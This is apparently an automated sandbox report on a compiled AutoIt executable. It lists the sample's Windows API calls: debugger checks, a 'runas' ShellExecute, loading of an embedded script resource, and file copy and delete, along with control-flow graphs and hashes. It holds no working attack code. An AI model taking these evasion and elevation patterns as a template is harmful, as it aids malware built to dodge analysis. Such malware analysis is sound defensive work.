102327 2ed990 102323->102327 102589 2d5c60 102324->102589 102326 2b4ede 102329 2b4bd0 102328->102329 102330 2b4c0c LoadLibraryA 102328->102330 102329->102284 102329->102285 102330->102329 102331 2b4c1d GetProcAddress 102330->102331 102331->102329 102334 2d527c __alloc_osfhnd 102332->102334 102333 2d528f 102381 2d8b28 58 API calls __getptd_noexit 102333->102381 102334->102333 102336 2d52c0 102334->102336 102351 2e04e8 102336->102351 102337 2d5294 102382 2d8db6 9 API calls _memcpy_s 102337->102382 102340 2d52c5 102341 2d52ce 102340->102341 102342 2d52db 102340->102342 102383 2d8b28 58 API calls __getptd_noexit 102341->102383 102344 2d5305 102342->102344 102345 2d52e5 102342->102345 102366 2e0607 102344->102366 102384 2d8b28 58 API calls __getptd_noexit 102345->102384 102349 2d529f __alloc_osfhnd 
[Execution graph of 6BRa130JDj.exe. In the original report this is an interactive graph of node IDs, virtual addresses, resolved names and call edges; only the resolved names survive extraction and are kept here.]

Nodes in the 0x2b0000 to 0x31ffff range are the AutoIt runtime and its statically linked CRT (helpers such as __alloc_osfhnd, __lock, _memcpy_s, _memset, __dosmaperr, __wsopen_nolock, __read, __write, __fclose_nolock, __cinit, __RTC_Initialize, ___raise_securityfailure, __tzset_nolock, std::exception::_Copy_str), with a large "Mailbox" subtree belonging to the interpreter.

Windows API calls reached from the graph, grouped by purpose:
Debugger and environment checks: IsDebuggerPresent (two call sites, one followed by MessageBoxA), IsProcessorFeaturePresent, GetVersionExW, GetCurrentProcess -> IsWow64Process, GetSystemInfo, GetNativeSystemInfo, IsThemeActive, SystemParametersInfoW.
Dynamic import resolution: LoadLibraryA -> GetProcAddress (two call sites), FreeLibrary.
Embedded resource access: FindResourceExW -> LoadResource -> SizeofResource -> LockResource.
Registry: RegOpenKeyExW -> RegQueryValueExW -> RegCloseKey.
File, path and console I/O: ReadFile, ReadConsoleW, GetConsoleMode, SetFilePointerEx, SetFileTime, GetStdHandle, GetFileType, GetOpenFileNameW, GetLongPathNameW, GetFullPathNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, CloseHandle, GetLastError.
Process startup and CRT state: GetStartupInfoW, GetCommandLineW, GetModuleFileNameW, GetEnvironmentStringsW / FreeEnvironmentStringsW, GetProcessHeap, HeapAlloc, TlsAlloc, TlsSetValue, GetCurrentThreadId, EncodePointer / DecodePointer, InitializeCriticalSectionAndSpinCount, EnterCriticalSection / LeaveCriticalSection, SetUnhandledExceptionFilter / UnhandledExceptionFilter, GetCurrentProcess -> TerminateProcess.
Other: OleInitialize, CreateThread, RegisterWindowMessageW, GetSystemTimeAsFileTime, MultiByteToWideChar, CharUpperBuffW, GetStringTypeW, Sleep.

A separate group of nodes at 0x1168938 to 0x116be42, outside the main image range above, resolves to GetPEB followed by Sleep.

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002B3B68
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 002B3B7A
                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,003752F8,003752E0,?,?), ref: 002B3BEB
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                      • Part of subcall function 002C092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002B3C14,003752F8,?,?,?), ref: 002C096E
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B3C6F
                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00367770,00000010), ref: 002ED281
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,003752F8,?,?,?), ref: 002ED2B9
                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00364260,003752F8,?,?,?), ref: 002ED33F
                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 002ED346
                                                                                                                      • Part of subcall function 002B3A46: GetSysColorBrush.USER32(0000000F), ref: 002B3A50
                                                                                                                      • Part of subcall function 002B3A46: LoadCursorW.USER32(00000000,00007F00), ref: 002B3A5F
                                                                                                                      • Part of subcall function 002B3A46: LoadIconW.USER32(00000063), ref: 002B3A76
                                                                                                                      • Part of subcall function 002B3A46: LoadIconW.USER32(000000A4), ref: 002B3A88
                                                                                                                      • Part of subcall function 002B3A46: LoadIconW.USER32(000000A2), ref: 002B3A9A
                                                                                                                      • Part of subcall function 002B3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002B3AC0
                                                                                                                      • Part of subcall function 002B3A46: RegisterClassExW.USER32(?), ref: 002B3B16
                                                                                                                      • Part of subcall function 002B39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B3A03
                                                                                                                      • Part of subcall function 002B39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B3A24
                                                                                                                      • Part of subcall function 002B39D5: ShowWindow.USER32(00000000,?,?), ref: 002B3A38
                                                                                                                      • Part of subcall function 002B39D5: ShowWindow.USER32(00000000,?,?), ref: 002B3A41
                                                                                                                      • Part of subcall function 002B434A: _memset.LIBCMT ref: 002B4370
                                                                                                                      • Part of subcall function 002B434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B4415
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%4
                                                                                                                    • API String ID: 529118366-2314548288
                                                                                                                    • Opcode ID: ad1b51032b9b6b9f21b1e5aa88762a417b2746cae902473b0c375d2e82e7bc78
                                                                                                                    • Instruction ID: 0f3a10483a9a77b48c249b6e3aea5cede4d94cb8b4a80102e02507ccaad3a276
                                                                                                                    • Opcode Fuzzy Hash: ad1b51032b9b6b9f21b1e5aa88762a417b2746cae902473b0c375d2e82e7bc78
                                                                                                                    • Instruction Fuzzy Hash: 69512630D24249AEDB26EBF4DC45EED7B78AF44790F40846AF415B21A3CAB05661CF20

                                                                                                                    Control-flow Graph

                                                                                                                    [Control-flow graph for the function at 002B49A0 (edge list and executed/not-executed legend omitted as extraction residue). Its basic blocks call GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo, as listed under APIs below.]
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 002B49CD
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • GetCurrentProcess.KERNEL32(?,0033FAEC,00000000,00000000,?), ref: 002B4A9A
                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 002B4AA1
                                                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 002B4AE7
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002B4AF2
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 002B4B23
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 002B4B2F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1986165174-0
                                                                                                                    • Opcode ID: d02a324e1006189ef5e8c140a54c966e76bc7ec09489c90f8165889b17f71321
                                                                                                                    • Instruction ID: 1689bed930726c78d2fb648f1989527f3f08d04c35d3655235da23899e1b118c
                                                                                                                    • Opcode Fuzzy Hash: d02a324e1006189ef5e8c140a54c966e76bc7ec09489c90f8165889b17f71321
                                                                                                                    • Instruction Fuzzy Hash: 1091E6319A97C1DEC731EF7884A01EAFFF5AF2A340F84496DD0C793A42D260A558C759

                                                                                                                    Control-flow Graph

                                                                                                                    [Control-flow graph for the function at 002B4E89 (edge list and executed/not-executed legend omitted as extraction residue). Its basic blocks call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource, as listed under APIs below.]
                                                                                                                    APIs
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,002B4D8E,?,?,00000000,00000000), ref: 002B4E99
                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002B4D8E,?,?,00000000,00000000), ref: 002B4EB0
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,002B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,002B4E2F), ref: 002ED937
                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,002B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,002B4E2F), ref: 002ED94C
                                                                                                                    • LockResource.KERNEL32(002B4D8E,?,?,002B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,002B4E2F,00000000), ref: 002ED95F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: SCRIPT
                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                    • Opcode ID: a5bf058c34571d6897eac299457281e9553ae4e40e50abaee8b9e804f6a69540
                                                                                                                    • Instruction ID: 0122625653d9f12f19ed78953aeae387fbadcc16485c543c263e41697b1fee76
                                                                                                                    • Opcode Fuzzy Hash: a5bf058c34571d6897eac299457281e9553ae4e40e50abaee8b9e804f6a69540
                                                                                                                    • Instruction Fuzzy Hash: 23119A74640701BFE7229F65EC88FA77BBEFBC5B51F204668F406C6261DB61E8008A60
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: pb7$%4
                                                                                                                    • API String ID: 3964851224-2664033170
                                                                                                                    • Opcode ID: e954c6a217a1ff146e861a0a1ad6462ecf085c96068491ec8226bf8a96c16868
                                                                                                                    • Instruction ID: 1636709e7a356a21abdbb28c4dee97cb64d8b7031c865c6c2773fb96570954ee
                                                                                                                    • Opcode Fuzzy Hash: e954c6a217a1ff146e861a0a1ad6462ecf085c96068491ec8226bf8a96c16868
                                                                                                                    • Instruction Fuzzy Hash: F2926970628341CFD720DF14C480B6AB7E5BF89344F14896DE99A8B362D7B1EC65CB92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Dd7$Dd7$Dd7$Dd7$Variable must be of type 'Object'.
                                                                                                                    • API String ID: 0-3687393284
                                                                                                                    • Opcode ID: 93e0b5058c70b2d2861b824a8f3e625c809efb632c9e5f1a6b1b2b404a2e2dd3
                                                                                                                    • Instruction ID: 79fdb24860284781f347b401f7ed50be7a94d0e513b32ea90724c5474a7ab3a2
                                                                                                                    • Opcode Fuzzy Hash: 93e0b5058c70b2d2861b824a8f3e625c809efb632c9e5f1a6b1b2b404a2e2dd3
                                                                                                                    • Instruction Fuzzy Hash: 55A28D74A2020ACFCF24CF58C490AEAB7B5FF58394F258469D9199B351D770EDA2CB90
APIs
• GetFileAttributesW.KERNELBASE(?,002EE398), ref: 0031446A
• FindFirstFileW.KERNELBASE(?,?), ref: 0031447B
• FindClose.KERNEL32(00000000), ref: 0031448B
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 6d46eaac7fc394f5b2a0ac1588b0aa2b76d3b85ff0097177a545c6bc0a9c90a3
• Instruction ID: 75b03522e5544ac8c6c3e17c03dca0b386747db0d81010b6ae32078d93fd7214
• Opcode Fuzzy Hash: 6d46eaac7fc394f5b2a0ac1588b0aa2b76d3b85ff0097177a545c6bc0a9c90a3
• Instruction Fuzzy Hash: DDE0D837814501AB82156B38EC4D8EA775C9F09335F500B15F835C20E0EB74994096D5
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002C0A5B
• timeGetTime.WINMM ref: 002C0D16
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002C0E53
• Sleep.KERNEL32(0000000A), ref: 002C0E61
• LockWindowUpdate.USER32(00000000,?,?), ref: 002C0EFA
• DestroyWindow.USER32 ref: 002C0F06
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002C0F20
• Sleep.KERNEL32(0000000A,?,?), ref: 002F4E83
• TranslateMessage.USER32(?), ref: 002F5C60
• DispatchMessageW.USER32(?), ref: 002F5C6E
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002F5C82
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
• String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb7$pb7$pb7$pb7
• API String ID: 4212290369-647323737
• Opcode ID: 8d6f3c33f4eab496bf8054fe4ff240c9cdc961a28cf4ab93e7085fcbec1f364c
• Instruction ID: f70a0babb62a0a0dbfc8290073ff8c1bab0ff70a51fb034f4ff83a2efe45cf3c
• Opcode Fuzzy Hash: 8d6f3c33f4eab496bf8054fe4ff240c9cdc961a28cf4ab93e7085fcbec1f364c
• Instruction Fuzzy Hash: 34B2D570624746DFD729DF24C885FAAF7E4BF84344F144A2DE659872A1C770E8A4CB82

Control-flow Graph

APIs
  • Part of subcall function 00318F5F: __time64.LIBCMT ref: 00318F69
  • Part of subcall function 002B4EE5: _fseek.LIBCMT ref: 002B4EFD
• __wsplitpath.LIBCMT ref: 00319234
  • Part of subcall function 002D40FB: __wsplitpath_helper.LIBCMT ref: 002D413B
• _wcscpy.LIBCMT ref: 00319247
• _wcscat.LIBCMT ref: 0031925A
• __wsplitpath.LIBCMT ref: 0031927F
• _wcscat.LIBCMT ref: 00319295
• _wcscat.LIBCMT ref: 003192A8
  • Part of subcall function 00318FA5: _memmove.LIBCMT ref: 00318FDE
  • Part of subcall function 00318FA5: _memmove.LIBCMT ref: 00318FED
• _wcscmp.LIBCMT ref: 003191EF
  • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319824
  • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319837
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00319452
• _wcsncpy.LIBCMT ref: 003194C5
• DeleteFileW.KERNEL32(?,?), ref: 003194FB
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00319511
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00319522
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00319534
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: 0ecb10070153603181b1864753303ed02212826a2dad5b6a6deafe2f9dde8428
• Instruction ID: 122e8a6936674917f18fd9ad814155055e618a42774ba1dd1868bd27309828a1
• Opcode Fuzzy Hash: 0ecb10070153603181b1864753303ed02212826a2dad5b6a6deafe2f9dde8428
• Instruction Fuzzy Hash: 48C15BB1D00219AACF26DF95CC95ADEB7BDEF59340F0040AAF609E7241DB309A948F65

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 002B3074
• RegisterClassExW.USER32(00000030), ref: 002B309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B30AF
• InitCommonControlsEx.COMCTL32(?), ref: 002B30CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B30DC
• LoadIconW.USER32(000000A9), ref: 002B30F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: fb6609bd788b1c4e13e4ee3c6441ff0842b4b216bd04be2d08e3cb66c1a39729
• Instruction ID: 258eb78dfe426b99255fd6de924f90bfa0c31316091b1c8af14dc147c70cdbc2
• Opcode Fuzzy Hash: fb6609bd788b1c4e13e4ee3c6441ff0842b4b216bd04be2d08e3cb66c1a39729
• Instruction Fuzzy Hash: 3E314771D44349AFDB12CFA4E888A89BBF8FB09310F14456EE584E62A1D3B54585CF51

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 002B3074
• RegisterClassExW.USER32(00000030), ref: 002B309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B30AF
• InitCommonControlsEx.COMCTL32(?), ref: 002B30CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B30DC
• LoadIconW.USER32(000000A9), ref: 002B30F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: ad35b0ecf83525f59192ac49193775a4bfd87e12ae5f49a0ec6ad9fd58e6b6a3
• Instruction ID: 40d858793f680c3e6f61ef5d74cd73ec83db52d9e1a3b81d3ccdb1b6b1e0f29c
• Opcode Fuzzy Hash: ad35b0ecf83525f59192ac49193775a4bfd87e12ae5f49a0ec6ad9fd58e6b6a3
• Instruction Fuzzy Hash: D121C7B1D11318AFDB16DFA8ED89BDDBBF8FB08700F40412AF915A62A0D7B145848F91

Control-flow Graph

APIs
  • Part of subcall function 002B4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003752F8,?,002B37AE,?), ref: 002B4724
  • Part of subcall function 002D050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002B7165), ref: 002D052D
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002B71A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002EE8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002EE909
• RegCloseKey.ADVAPI32(?), ref: 002EE947
• _wcscat.LIBCMT ref: 002EE9A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 8cff855474db140bef7a821140f5ec211253257b208322834ed09b6c6bb7a5a0
• Instruction ID: ea0d8b2c3c0d2b37188db3869c62bd5e5a3064586e90fa575e34ff763289b783
• Opcode Fuzzy Hash: 8cff855474db140bef7a821140f5ec211253257b208322834ed09b6c6bb7a5a0
• Instruction Fuzzy Hash: 8171AF714187019EC751EF25E8929ABB7ECFF84350F80092EF449972B2DB719998CF51

Control-flow Graph

Control-flow graph of the function at 002B3633 (the rendered basic-block edge list and its Executed/Not Executed node legend are omitted here; the graph's blocks reference DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus).
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 002B36D2
• KillTimer.USER32(?,00000001), ref: 002B36FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B372A
• CreatePopupMenu.USER32 ref: 002B373E
• PostQuitMessage.USER32(00000000), ref: 002B374D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated$%4
                                                                                                                    • API String ID: 129472671-1770572163
                                                                                                                    • Opcode ID: bb3243c1e2c2fcb8ed1952cfa82235b4900fe14fa395d8f2ec15d177d76345ae
                                                                                                                    • Instruction ID: 507c2e8222475892084a12c9f66c23c2b6957e4fbb79af0a32db1dbf4972ead0
